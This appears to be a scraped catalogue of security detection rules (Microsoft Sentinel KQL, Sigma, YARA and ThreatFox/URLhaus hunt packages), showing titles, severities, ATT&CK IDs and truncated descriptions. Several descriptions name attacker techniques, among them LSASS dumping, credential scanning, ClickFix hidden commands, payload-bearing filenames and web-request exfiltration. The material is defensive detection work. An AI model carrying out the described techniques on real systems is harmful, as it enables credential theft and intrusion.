'This query looks for file hashes and AV signatures associated with Prestige ransomware payload.'
T1190
'This query identifies exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893) to the VPN server'
T1071
CommonSecurityLogSigninLogs
'This content is utilized to identify instances of successful login by risky users, who have been observed engaging in potentially suspicious network activity on non-Microsoft network devices.'
RunningRAT request parameters
kql high
T1041T1071.001
CommonSecurityLog
'This detection will alert when RunningRAT URI parameters or paths are detect in an HTTP request. Id the device blocked this communication presence of this alert means the RunningRAT implant is likely
T1562
DeviceProcessEventsSecurityEventWindowsEvent
'Identifies attempts to modify registry ACL to evade security solutions. In the Solorigate attack, the attackers were found modifying registry permissions so services.exe cannot access the relevant re
T1078.004
AuditLogs
'Detects a Service Principal being assigned an app role that has sensitive access such as Mail.Read. A threat actor who compromises a Service Principal may assign it an app role to allow it to acces
Service Principal Assigned Privileged Role
kql medium
T1078.004
AuditLogs
'Detects a privileged role being added to a Service Principal. Ensure that any assignment to a Service Principal is valid and appropriate - Service Principals should not be assigned to very highly p
Star Blizzard C2 Domains August 2022
kql high
T1566
AzureDiagnosticsCommonSecurityLogDeviceNetworkEventsEmailEventsEmailUrlInfoVMConnection
'Identifies a match across various data feeds for domains related to an actor tracked by Microsoft as Star Blizzard.'
DeviceProcessEvents
Identifies suspicious child processes of SolarWinds.Orion.Core.BusinessLayer.dll that may be evidence of the SUNBURST backdoor References: - https://www.fireeye.com/blog/threat-research/2020/12/evasiv
T1078.004
AuditLogs
' This query will detect when an attempt is made to update an existing user and link it to an guest or external identity. These activities are unusual and such linking of external identities should b
Suspicious Login from deleted guest account
kql medium
T1078.004
AuditLogsSigninLogs
' This query will detect logins from guest account which was recently deleted. For any successful logins from deleted identities should be investigated further if any existing user accounts have been
T1078.004
AuditLogsIdentityInfo
'This query will detect if user properties of Global Administrator are updated by an existing user. Usually only user administrator or other global administrator can update such properties. Investigat
T1078.004
BehaviorAnalytics
'This query looks for sign ins by the Microsoft Entra ID Connect Sync account to Azure where properties about the logon are anomalous. This query uses Microsoft Sentinel's UEBA features to detect thes
T1078T1106T1526
AuditLogsIdentityInfoSecurityAlert
'This detection identifies high-severity alerts across various Microsoft security products, including Microsoft Defender XDR and Microsoft Entra ID, and correlates them with instances of Google Cloud
T1030
CommonSecurityLog
'Identifies anamalous spikes in network traffic logs as compared to baseline or normal historical patterns. The query leverages a KQL built-in anomaly detection algorithm to find large deviations from
T1030
CommonSecurityLogVMConnection
'Identifies anomalous data transfer to public networks. The query leverages built-in KQL anomaly detection algorithms that detects large deviations from a baseline pattern. A sudden increase in data t
Trust Monitor Event
kql medium
T1528T1555
'This query identifies when a new trust monitor event is detected.'
Unusual Anomaly
kql medium
'Anomaly Rules generate events in the Anomalies table. This scheduled rule tries to detect Anomalies that are not usual, they could be a type of Anomaly that has recently been activated, or an infrequ
T1136
DeviceProcessEventsSecurityEvent
' The query below identifies creation of unusual identity by the Europium actor to mimic Microsoft Exchange Health Manager Service account using Exchange PowerShell commands Reference: https://www.m
T1078.004
AuditLogsSigninLogs
'Detects a URL being added to an application where the domain is not one that is associated with the tenant. The query uses domains seen in sign in logs to determine if the domain is associated with
T1136.003
AuditLogs
'This query looks for accounts being created where the name does not match a defined pattern. Attackers may attempt to add accounts as a means of establishing persistant access to an environment, lo
T1136.003
AuditLogs
'This query looks for accounts being created that do not have attributes populated that are commonly populated in the tenant. Attackers may attempt to add accounts as a means of establishing persist
User State changed from Guest to Member
kql medium
T1098
AuditLogs
'Detects when a guest account in a tenant is converted to a member of the tenant. Monitoring guest accounts and the access they are provided is important to detect potential account abuse. Account
T1530T1213T1020
This query monitors for users running Log Analytics queries that contain filters for specific, defined VIP user accounts or the VIPUser watchlist template. Use this detection to alert for users specif
T1110
CommonSecurityLog
'Identifies instances where Wazuh logged over 400 '403' Web Errors from one IP Address. To onboard Wazuh data into Sentinel please view: https://documentation.wazuh.com/current/cloud-security/azure/in
T1041T1071.001
CommonSecurityLogDeviceEvents
'This detection will identify network requests in HTTP proxy data that contains Base64 encoded usernames from machines in the DeviceEvents table. This technique was seen usee by POLONIUM in their Runn
Dynamic .NET Compilation Via Csc.EXE
sigma medium
T1027.004
imProcessCreate
Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
Uncommon Svchost Command Line Parameter
sigma high
T1036.005T1055T1055.012
imProcessCreate
Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns. This could point at a file masquerading as svchost, a proc
T1036.002
imProcessCreate
Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This character is used as an obfuscation and masquerad
T1059T1027T1140
imProcessCreate
'Identifies instances of a base64 encoded PE file header seen in the process command line parameter. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://ak
T1110
imAuthentication
'Identifies evidence of brute force activity against a user based on multiple authentication failures and at least one successful authentication within a given time window. Note that the query does no
DebuggerCheck DrWatson
yara low
YARA rule: DebuggerCheck__DrWatson
DebuggerCheck GlobalFlags
yara low
YARA rule: DebuggerCheck__GlobalFlags
DebuggerCheck PEB
yara low
YARA rule: DebuggerCheck__PEB
DebuggerCheck QueryInfo
yara low
YARA rule: DebuggerCheck__QueryInfo
DebuggerCheck RemoteAPI
yara low
YARA rule: DebuggerCheck__RemoteAPI
DebuggerException ConsoleCtrl
yara low
YARA rule: DebuggerException__ConsoleCtrl
DebuggerException SetConsoleCtrl
yara low
YARA rule: DebuggerException__SetConsoleCtrl
DebuggerException UnhandledFilter
yara low
YARA rule: DebuggerException__UnhandledFilter
DebuggerHiding Active
yara low
YARA rule: DebuggerHiding__Active
DebuggerHiding Thread
yara low
YARA rule: DebuggerHiding__Thread
DebuggerOutput String
yara low
YARA rule: DebuggerOutput__String
DebuggerPattern RDTSC
yara low
YARA rule: DebuggerPattern__RDTSC
DebuggerTiming PerformanceCounter
yara low
YARA rule: DebuggerTiming__PerformanceCounter
DebuggerTiming Ticks
yara low
YARA rule: DebuggerTiming__Ticks
T1569T1003
SecurityAlertimProcessCreate
'This hunting query looks for file paths/hashes related to observed activity by Dev-0228. The actor is known to use custom version of popular tool like PsExec, Procdump etc. to carry its activity. Th
T1071.001
'Identifies callouts to Discord CDN addresses for risky file extensions. This detection will trigger when a callout for a risky file is made to a discord server that has only been seen once in your en
T1496
'Identifies IP addresses that may be performing DNS lookups associated with common currency mining pools. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in or custom s
T1048
'Identifies IP addresses performing DNS lookups associated with common ToR proxies. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in or custom source that supports th
T1110T1556
This rule identifies a source that repeatedly fails to authenticate to a web service (HTTP response code 403). This may indicate a [brute force](https://en.wikipedia.org/wiki/Brute-force_attack) or [c
T1568T1008
'This creates an incident in the event a client generates excessive amounts of DNS queries for non-existent domains. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in
T1564
imProcessCreate
'Identifies malware that has been hidden in the recycle bin. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimProcessEvent)'
Midnight Blizzard - suspicious rundll32.exe execution of vbscript (Normalized Process Events)
kql medium
T1547
imProcessCreate
'This query idenifies when rundll32.exe executes a specific set of inline VBScript commands References: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-m
T1072T1570
'This detection highlights executables deployed to hosts via either the Default Domain or Default Domain Controller Policies. These policies apply to all hosts or Domain Controllers and best practice
Potential DGA detected (ASIM DNS Schema)
kql medium
T1568T1008
DnsEvents
'Identifies clients with a high NXDomain count which could be indicative of a DGA (cycling through possible C2 domains where most C2s are not live). Alert is generated when a new IP address is seen (b
T1110
imAuthentication
'This query searches for failed attempts to log in from more than 15 various users within a 5 minute timeframe from the same source. This is a potential indication of a password spray attack To use t
T1485T1036
'This detection looks for command line parameters associated with the use of Sysinternals sdelete (https://docs.microsoft.com/sysinternals/downloads/sdelete) to delete multiple files on a host's C dri
T1018
imProcessCreate
'Identifies the host and account that executed AdFind by hash and filename in addition to common and unique flags that are used by many threat actors in discovery. To use this analytics rule, make sur
T1485
'This query looks for the Sdelete process being run recursively after being deployed to a host via GPO. Attackers could use this technique to deploy Sdelete to multiple host and delete data on them.
SEH v3
yara low
YARA rule: SEH__v3
SEH v4
yara low
YARA rule: SEH__v4
SEH vba
yara low
YARA rule: SEH__vba
SEH vectored
yara low
YARA rule: SEH__vectored
Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
kql medium
T1078T1098
imAuthentication
'Identifies IPs with failed attempts to sign in to one or more disabled accounts signed in successfully to another account. To use this analytics rule, make sure you have deployed the [ASIM normalizat
T1195T1059T1546
imFileEvent
Identifies SolarWinds SUNBURST and SUPERNOVA backdoor file hash IOCs in File Events To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimFileEven
T1059T1543
imProcessCreate
Identifies suspicious child processes of SolarWinds.Orion.Core.BusinessLayer.dll that may be evidence of the SUNBURST backdoor References: - https://www.fireeye.com/blog/threat-research/2020/12/evasiv
ThreadControl Context
yara low
YARA rule: ThreadControl__Context
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 108 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 31 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 14 IOCs associated with Cobalt Strike
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Havoc
ThreatFox: Meterpreter IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Meterpreter
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with NetSupportManager RAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 4 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 9 IOCs associated with Remcos
ThreatFox: SocksProxyGo IOCs
ioc-hunt high
DeviceFileEventsUrlClickEvents
Hunt package for 4 IOCs associated with SocksProxyGo
ThreatFox: XWorm IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 5 IOCs associated with XWorm
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 46 malicious URLs tagged as 32-bit
URLhaus: ACRStealer Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 32 malicious URLs tagged as ACRStealer
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as Mozi
T1078
imAuthentication
'This query searches for successful user logins from different countries within 3 hours. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimAu
WindowsPE
yara low
YARA rule: WindowsPE
Invoke-Obfuscation Obfuscated IEX Invocation
sigma high
T1027T1059.001
imProcessCreate
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
Invoke-Obfuscation Via Stdin
sigma high
T1027T1059.001
imProcessCreate
Detects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use Clip
sigma high
T1027T1059.001
imProcessCreate
Detects Obfuscated Powershell via use Clip.exe in Scripts
Obfuscated IP Download Activity
sigma medium
imProcessCreate
Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
Obfuscated IP Via CLI
sigma medium
imProcessCreate
Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
T1027.009
imProcessCreate
Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
T1059.006T1027.010
imProcessCreate
Detects the use of Python's base64 decoding functions in command line executions on Linux systems. Malicious scripts often use python one-liners to decode and execute base64-encoded payloads, which is
BloodHound Collection Files
sigma high
T1087.001T1087.002T1482T1069.001T1069.002T1059.001
imFileEvent
Detects default file names outputted by the BloodHound collection tool SharpHound
OpenEDR Spawning Command Shell
sigma medium
T1059.003T1021.004T1219
imProcessCreate
Detects the OpenEDR ssh-shellhost.exe spawning a command shell (cmd.exe) or PowerShell with PTY (pseudo-terminal) capabilities. This may indicate remote command execution through OpenEDR's remote mana
T1105T1570T1219
imFileEvent
Detects the creation of potentially suspicious files by OpenEDR's ITSMService process. The ITSMService is responsible for remote management operations and can create files on the system through the Pr
T1059.005T1059.007
imProcessCreate
Detects wscript/cscript/mshta executions of scripts located in user directories
T1059.001
imProcessCreate
Detects a potentially suspicious powershell script executions from temporary folder
T1574.001
DeviceImageLoadEvents
Detects image load events of system control panel items (.cpl) from uncommon or non-system locations that may indicate DLL sideloading or other abuse techniques.
System File Execution Location Anomaly
sigma high
T1036
imProcessCreate
Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
T1036.005
imFileEvent
Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using
T1195.002T1557
imProcessCreate
Detects suspicious child process creation by the Notepad++ updater process (gup.exe). This could indicate potential exploitation of the updater component to deliver unwanted malware.
T1195.002T1557
imFileEvent
Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations. This could indicate potential exploitation of the updater component to deliver unwanted malware or unwar
Windows Vulnerable Driver Blocklist Disabled
sigma high
T1562.001
imRegistry
Detects when the Windows Vulnerable Driver Blocklist is set to disabled. This setting is crucial for preventing the loading of known vulnerable drivers, and its modification may indicate an attempt to
Capabilities Discovery - Linux
sigma low
T1083
imProcessCreate
Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
Creation Of Non-Existent System DLL
sigma medium
T1574.001
imFileEvent
Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes. Phantom DLL hijacking invol
T1548T1554
imProcessCreate
Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs
T1548T1554
imProcessCreate
Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs)
T1112T1574.001
imRegistry
Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings. Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious
Suspicious Shell Open Command Registry Modification
sigma medium
T1548.002T1546.001
imRegistry
Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence. Generally, modifications to the `*\shell\open\command` registry key can
HackTool - WSASS Execution
sigma high
T1003.001
imProcessCreate
Detects execution of WSASS, a tool used to dump LSASS memory on Windows systems by leveraging WER's (Windows Error Reporting) WerFaultSecure.EXE to bypass PPL (Protected Process Light) protections.
Office Autorun Keys Modification
sigma medium
T1547.001
imRegistry
Detects modification of autostart extensibility point (ASEP) in registry. Adversaries may modify these keys to execute malicious code when Office files are opened. There are various legitimate add-ins
Outlook Security Settings Updated - Registry
sigma medium
T1137
imRegistry
Detects changes to the registry values related to outlook security settings
T1137.006
imRegistry
Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
T1003T1562.001
DeviceImageLoadEvents
Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories. These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes o
Suspicious Msiexec Execute Arbitrary DLL
sigma medium
T1218.007
imProcessCreate
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installatio
Modify User Shell Folders Startup Value
sigma high
T1547.001
imRegistry
Detect modification of the User Shell Folders registry values for Startup or Common Startup which could indicate persistence attempts. Attackers may modify User Shell Folders registry keys to point to
Suspicious Package Installed - Linux
sigma medium
T1553.004
imProcessCreate
Detects installation of suspicious packages using system installation utilities
Potential AutoLogger Sessions Tampering
sigma high
T1685.001
imRegistry
Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging. The AutoLogger event tracing session records events up that occur early in the operating sys
Windows Credential Guard Disabled - Registry
sigma high
T1562.001
imRegistry
Detects attempts to disable Windows Credential Guard by setting registry values to 0. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can
T1562.001
imRegistry
Detects attempts to disable Windows Credential Guard by deleting registry values. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can acc
AMSI Disabled via Registry Modification
sigma high
T1562.001T1562.006
imRegistry
Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value. Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications
T1218T1105
imFileEvent
Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution. Adversaries may leverage legitimate applica
T1482T1087T1087.001T1087.002T1069.001T1069.002T1069T1059.001
imProcessCreate
Detects Commandlet names from well-known PowerShell exploitation frameworks
Malicious PowerShell Scripts - FileCreation
sigma high
T1059.001
imFileEvent
Detects the creation of known offensive powershell scripts used for exploitation
Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
sigma high
T1105
imNetworkSession
Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
sigma high
T1105
imNetworkSession
Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
CredUI.DLL Loaded By Uncommon Process
sigma medium
T1056.002
DeviceImageLoadEvents
Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
Desktop.INI Created by Uncommon Process
sigma medium
T1547.009
imFileEvent
Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
T1486T1562.001
DeviceImageLoadEvents
Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (
Wow6432Node CurrentVersion Autorun Keys Modification
sigma medium
T1547.001
imRegistry
Detects modification of autostart extensibility point (ASEP) in registry.
Creation of WerFault.exe/Wer.dll in Unusual Folder
sigma medium
T1574.001
imFileEvent
Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
T1574.001
DeviceImageLoadEvents
Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
T1490
DeviceImageLoadEvents
Detects the image load of VSS DLL by uncommon executables
Potentially Suspicious WDAC Policy File Creation
sigma medium
imFileEvent
Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicio
Startup Folder File Write
sigma medium
T1547.001
imFileEvent
A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
Hacktool - EDR-Freeze Execution
sigma high
T1685
imProcessCreate
Detects execution of EDR-Freeze, a tool that exploits the MiniDumpWriteDump function and WerFaultSecure.exe to suspend EDR and Antivirus processes on Windows. EDR-Freeze leverages a race-condition att
T1204.004T1027.010
imProcessCreate
Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection. Cl
T1552T1005T1059.004
imProcessCreate
Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets,
T1552T1005T1059.007
imProcessCreate
Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets,
Suspicious ArcSOC.exe Child Process
sigma high
T1059T1203
imProcessCreate
Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe. ArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromise
Suspicious File Created by ArcSOC.exe
sigma high
T1127T1105T1133
imFileEvent
Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS server, creates a file with suspicious file type, indicating that it may be an executable,
T1082
imProcessCreate
Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
Suspicious FileFix Execution Pattern
sigma high
T1204.004
imProcessCreate
Detects suspicious FileFix execution patterns where users are tricked into running malicious commands through browser file upload dialog manipulation. This attack typically begins when users visit mal
RDP Sensitive Settings Changed
sigma high
T1112
imRegistry
Detects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
T1059.004T1027
imFileEvent
Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. These filenames exploit shell interpretation quirks to trigg
FileFix - Command Evidence in TypedPaths
sigma high
T1204.004
imRegistry
Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.
Network Connection Initiated via Finger.EXE
sigma high
T1071.004T1059.003
imNetworkSession
Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices. In one ClickFix malware campaign, adversaries leveraged t
T1204.001
imRegistry
Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links. ClickFix is known to be distributed through phishing campaigns an
T1204.001T1204.004
imProcessCreate
Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar
T1059.003T1027.010
imProcessCreate
Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing. This pattern may indicate an attempt to discover and execute system binar
T1546.015
imRegistry
Detects potential COM object hijacking via modification of default system CLSID.
T1204.004T1027.010
imRegistry
Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run di
T1204.004T1027.010
imRegistry
Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.
T1136.001
imRegistry
Sysmon registry detection of a local hidden user account.
Explorer Process Tree Break
sigma medium
T1036
imProcessCreate
Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of e
MSDT Execution Via Answer File
sigma high
T1218
imProcessCreate
Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
Office Macro File Download
sigma low
T1566.001
imFileEvent
Detects the creation of a new office macro files on the system via an application (browser, mail client). This can help identify potential malicious activity, such as the download of macro-enabled doc
Suspicious CustomShellHost Execution
sigma high
T1216
imProcessCreate
Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\Windows\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion technique
File Download From Browser Process Via Inline URL
sigma medium
T1105
imProcessCreate
Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for exam
Tor Client/Browser Execution
sigma high
T1090.003
imProcessCreate
Detects the use of Tor or Tor-Browser to connect to onion routing networks
T1546.015
imRegistry
Detects COM object hijacking via TreatAs subkey
Potential Persistence Via Logon Scripts - Registry
sigma medium
T1037.001
imRegistry
Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
imRegistry
Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections. Attackers may add custom AMSI providers to persist on the system and
T1588.002
imRegistry
Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key
PUA - Sysinternals Tools Execution - Registry
sigma medium
T1588.002
imRegistry
Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.
T1588.002
imRegistry
Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)
Cred Dump Tools Dropped Files
sigma high
T1003.001T1003.002T1003.003T1003.004T1003.005
imFileEvent
Files with well-known filenames (parts of credential dump software or files produced by them) creation
T1685
imRegistry
Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
Removal Of SD Value to Hide Schedule Task - Registry
sigma medium
T1685
imRegistry
Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
T1082
imProcessCreate
Detects attempts to query system information directly from the Windows Registry.
PUA - AdFind Suspicious Execution
sigma high
T1018T1087.002T1482T1069.002
imProcessCreate
Detects AdFind execution with common flags seen used during attacks
T1021.003T1218
imProcessCreate
Detects suspicious Speech Runtime Binary Execution by monitoring its child processes. Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacki
WFP Filter Added via Registry
sigma medium
T1685T1569.002
imRegistry
Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
Classes Autorun Keys Modification
sigma medium
T1547.001
imRegistry
Detects modification of Windows Registry Classes keys used for persistence. Adversaries modify these autostart extensibility points (ASEP) to execute malicious code when file types are opened or actio
Common Autorun Keys Modification
sigma medium
T1547.001
imRegistry
Detects modification of autostart extensibility point (ASEP) in registry.
CurrentVersion Autorun Keys Modification
sigma medium
T1547.001
imRegistry
Detects modification of autostart extensibility point (ASEP) in registry.
CurrentVersion NT Autorun Keys Modification
sigma medium
T1547.001
imRegistry
Detects modification of autostart extensibility point (ASEP) in registry.
Modification of IE Registry Settings
sigma low
T1112
imRegistry
Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted si
Potential Lateral Movement via Windows Remote Shell
sigma medium
T1021.006
imProcessCreate
Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.
Potential Persistence Via Shim Database Modification
sigma medium
T1546.011
imRegistry
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework
T1564.001
imRegistry
Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
Scheduled Task Creation Via Schtasks.EXE
sigma low
T1053.005
imProcessCreate
Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
T1053T1053.005
imRegistry
Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
T1547.001
imRegistry
Detects modification of autostart extensibility point (ASEP) in registry.
HackTool - Windows Credential Editor (WCE) Execution
sigma critical
T1003.001
imProcessCreate
Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory. It is often used by threat ac
Potentially Suspicious JWT Token Search Via CLI
sigma medium
T1528T1552.001
imProcessCreate
Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". JWT tokens are often used for access-tokens across various applications and services like M
Suspicious File Write to Webapps Root Directory
sigma medium
T1505.003T1190
imFileEvent
Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. This may indicate an attempt to deploy malicious files such as web shells o
Usage Of Web Request Commands And Cmdlets
sigma medium
T1059.001
imProcessCreate
Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
Use Short Name Path in Image
sigma medium
T1564.004
imProcessCreate
Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection
File Access Of Signal Desktop Sensitive Data
sigma medium
T1003
imRegistry
Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json. The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the co
T1059.001
imProcessCreate
Detects the use of various CLI utilities exfiltrating data via web requests
Potential LSASS Process Dump Via Procdump
sigma high
T1036T1003.001
imProcessCreate
Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump. This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LS
Suspicious Network Command
sigma low
T1016
imProcessCreate
Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
Suspicious SYSTEM User Process Creation
sigma high
T1134T1003T1027
imProcessCreate
Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
BaaUpdate.exe Suspicious DLL Load
sigma high
T1218T1021.003
DeviceImageLoadEvents
Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM &
T1562.001
imProcessCreate
Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. This activity may indicate a manual interruption of the antivirus service by an administrator,
T1218T1021.003
